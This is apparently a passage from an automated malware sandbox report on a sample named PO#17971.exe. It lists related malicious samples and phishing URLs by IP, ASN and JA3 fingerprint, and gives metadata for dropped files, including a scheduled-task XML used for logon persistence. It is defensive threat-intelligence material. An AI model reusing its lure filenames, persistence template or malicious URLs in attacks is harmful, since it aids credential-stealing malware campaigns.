	Tepe - 20000000826476479.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	PO#3_RKG367.bat	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	104.21.80.1
	SOA NOV. Gateway Freight_MEDWA0577842.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
	dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	1C24TDP_000000029.jse	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1
us2.smtp.mailhostbox.com	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	208.91.199.223
	document pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.225
	m30zZYga23.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.223
	New Purchase Order Document for PO1136908 000 SE.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.225
	nuevo orden.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	Lpjrd6Wxad.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.198.143
	REnBTVfW8q.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	208.91.199.223
	ulf4JrCRk2.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	208.91.199.223
	Nt8BLNLKN7.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	208.91.199.223
	copto de pago.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
api.telegram.org	RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://marcuso-wq.github.io/home/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Nuevo pedido.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Benefit_401k_2025_Enrollment.pdf	Get hash	malicious	Unknown	Browse	149.154.167.220
	gem1.exe	Get hash	malicious	Unknown	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://marcuso-wq.github.io/home/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Nuevo pedido.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Benefit_401k_2025_Enrollment.pdf	Get hash	malicious	Unknown	Browse	149.154.167.220
	gem1.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
ORACLE-BMC-31898US	IMG_10503677.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	Tepe - 20000000826476479.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	PO#3_RKG367.bat	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	SOA NOV. Gateway Freight_MEDWA0577842.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	Tepe - 20000000826476479.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	Nuevo pedido.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	Payment 01.08.25.pdf.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	December Reconciliation QuanKang.exe	Get hash	malicious	Unknown	Browse	193.122.6.168
CLOUDFLARENETUS	http://www.lpb.gov.lr	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	104.17.25.14
	https://samantacatering.com/	Get hash	malicious	Unknown	Browse	104.21.83.97
	https://sign.zoho.com/zsguest?locale=en&sign_id=234b4d535f4956237c699124bb06f6840075804affff79070f72fbd27ec4885c3a2ba06657b8a52338eb80052baee9f74c4e2e0e7f85c073df939f1ac4dff75f76c95d46ac2361c7b14335e4f12c5c5d49c49b1d2f4c838a&action_type=SIGN	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://www.filemail.com/d/rxythqchkhluipl?skipreg=true	Get hash	malicious	Unknown	Browse	104.17.24.14
	random.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.79.9
	http://arpaeq.ca	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://eu.jotform.com/app/250092704521347	Get hash	malicious	Unknown	Browse	104.22.72.81
	https://eu.jotform.com/app/250092704521347	Get hash	malicious	Unknown	Browse	104.22.72.81
	http://eu.jotform.com/app/250092704521347	Get hash	malicious	Unknown	Browse	104.22.72.81
PUBLIC-DOMAIN-REGISTRYUS	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	208.91.199.223
	PO23100076.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	199.79.62.115
	ENQ-0092025.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	208.91.198.176
	document pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.225
	yxU3AgeVTi.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	208.91.198.176
	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	208.91.198.176
	http://www.technoafriwave.rw	Get hash	malicious	Unknown	Browse	207.174.214.183
	W2k2NLSvja.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.115
	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	208.91.198.176
	YinLHGpoX4.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	103.53.42.63

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	IMG_10503677.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1
	RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	Tepe - 20000000826476479.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1
	PO#3_RKG367.bat	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	104.21.96.1
	SOA NOV. Gateway Freight_MEDWA0577842.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1
	dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	1C24TDP_000000029.jse	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1
3b5074b1b5d032e5620f69f9f700ff0e	https://sign.zoho.com/zsguest?locale=en&sign_id=234b4d535f4956237c699124bb06f6840075804affff79070f72fbd27ec4885c3a2ba06657b8a52338eb80052baee9f74c4e2e0e7f85c073df939f1ac4dff75f76c95d46ac2361c7b14335e4f12c5c5d49c49b1d2f4c838a&action_type=SIGN	Get hash	malicious	Unknown	Browse	149.154.167.220
	IMG_10503677.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	XClient.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	1736491685cd440ba02224486139c45779065ac91a3edb422c48d3d3c6920c4d30fc9d2bfc582.dat-decoded.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	149.154.167.220
	https://aqctslc.com/	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://sacredartscommunications.com/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	http://stonecoldstalley.com/	Get hash	malicious	Unknown	Browse	149.154.167.220
	RFQ-12202430_ACD_Group.pif.exe	Get hash	malicious	Unknown	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\PO#17971.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TZRtlifudvO.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\TZRtlifudvO.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	2232
Entropy (8bit):	5.379633281639906
Encrypted:	false
SSDEEP:	48:BWSU4xympjgZ9tz4RIoUl8NPZHUl7u1iMugeC/ZM0Uyus:BLHxvCZfIfSKRHmOugw1s
MD5:	6080EFD5BD4DF96F96ACE58B4A7F18E8
SHA1:	19746428B4A96E9B1A5ED5694BFCE56F66F2068D
SHA-256:	85639D6A2E10CB986472805935F55FE9FBA47A9D686F153A5431176957FB50CF
SHA-512:	2EA4809DD48A4537904692F179BB2097731CDE2C0A1C1F026D7D53BF67D5001F79B9D54F3BE45856BC8115D18AE9FA8F55BD189492FAF9531776542BBCFF33CB
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3dnpdxoo.n4e.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ago4tu5k.as2.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fuxjkitp.1o0.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_onhtrnd4.ova.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_psszs03j.hnm.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rhmyp1su.2l5.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_teh4qfah.cdj.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zmtmstaw.jte.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp55D6.tmp

Download File

Process:	C:\Users\user\Desktop\PO#17971.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1584
Entropy (8bit):	5.100329970901463
Encrypted:	false
SSDEEP:	24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt3xvn:cgergYrFdOFzOzN33ODOiDdKrsuTBv
MD5:	078BF11A2C1F939B30F2AC411AF41997
SHA1:	B91B826CC5D4CE12875DEEAE7EF80BE345209FC2
SHA-256:	5D4C72235512406C148A1DF77AF3A15F7AEC6FD276BF9EA6E5D726E2240F71A1
SHA-512:	EC9B403C7088207057C9A45EB3344A9F2114DEBD672F56EC064BC093A4884AB73DC8F61FFFBB26D2E0A4CF1FCA4E46B00176A2AC389173D77EEBC7B694700BCD
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Local\Temp\tmp6BBF.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\TZRtlifudvO.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1584
Entropy (8bit):	5.100329970901463
Encrypted:	false
SSDEEP:	24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt3xvn:cgergYrFdOFzOzN33ODOiDdKrsuTBv
MD5:	078BF11A2C1F939B30F2AC411AF41997
SHA1:	B91B826CC5D4CE12875DEEAE7EF80BE345209FC2
SHA-256:	5D4C72235512406C148A1DF77AF3A15F7AEC6FD276BF9EA6E5D726E2240F71A1
SHA-512:	EC9B403C7088207057C9A45EB3344A9F2114DEBD672F56EC064BC093A4884AB73DC8F61FFFBB26D2E0A4CF1FCA4E46B00176A2AC389173D77EEBC7B694700BCD
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Roaming\TZRtlifudvO.exe

Download File

Process:	C:\Users\user\Desktop\PO#17971.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	685568
Entropy (8bit):	7.709086520886259
Encrypted:	false
SSDEEP:	12288:mEwl9Z7a0GM4Rb9So1JELBYaKMwzyrdowvUI69boqatgOr/2MlxSTtXVHM3IN:wawLNOwd69+tgyuMloTpDN
MD5:	7A01CE7B443E4C2F5344EF3EC0E21538
SHA1:	90F517920D408F9DB6CDBEB6F67BA7C62708C851
SHA-256:	EE6993E7AFBF9A039DB981542C0250E22FCAA01434DB911732851C9E52BB38B6
SHA-512:	9D14F5FD61CAD5696B70BB2CEECADD495B41EBCA1F2691D4DCE8CCD1504DB3C3CF58889DF8EB799BDA19D481803B727D55867512614F4733116DDA77A22D26FC
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 42%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g..............0..V..........Ft... ........@.. ....................................`..................................s..O.......T............................................................................ ............... ..H............text...LT... ...V.................. ..`.rsrc...T............X..............@..@.reloc...............t..............@..B................(t......H.......PN...Q......]...T................................................0..)........{.........(....t......\|......(...+...3.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(....t......\|......(...+...3...{...."..}......{...."..}....b.s"...%.o.......(.......0..l........(.......o....o..........,...o.......0o....&..o....o..........,....(.......}......}.....+..r...pr...ps ...z.0..p...

C:\Users\user\AppData\Roaming\TZRtlifudvO.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\PO#17971.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
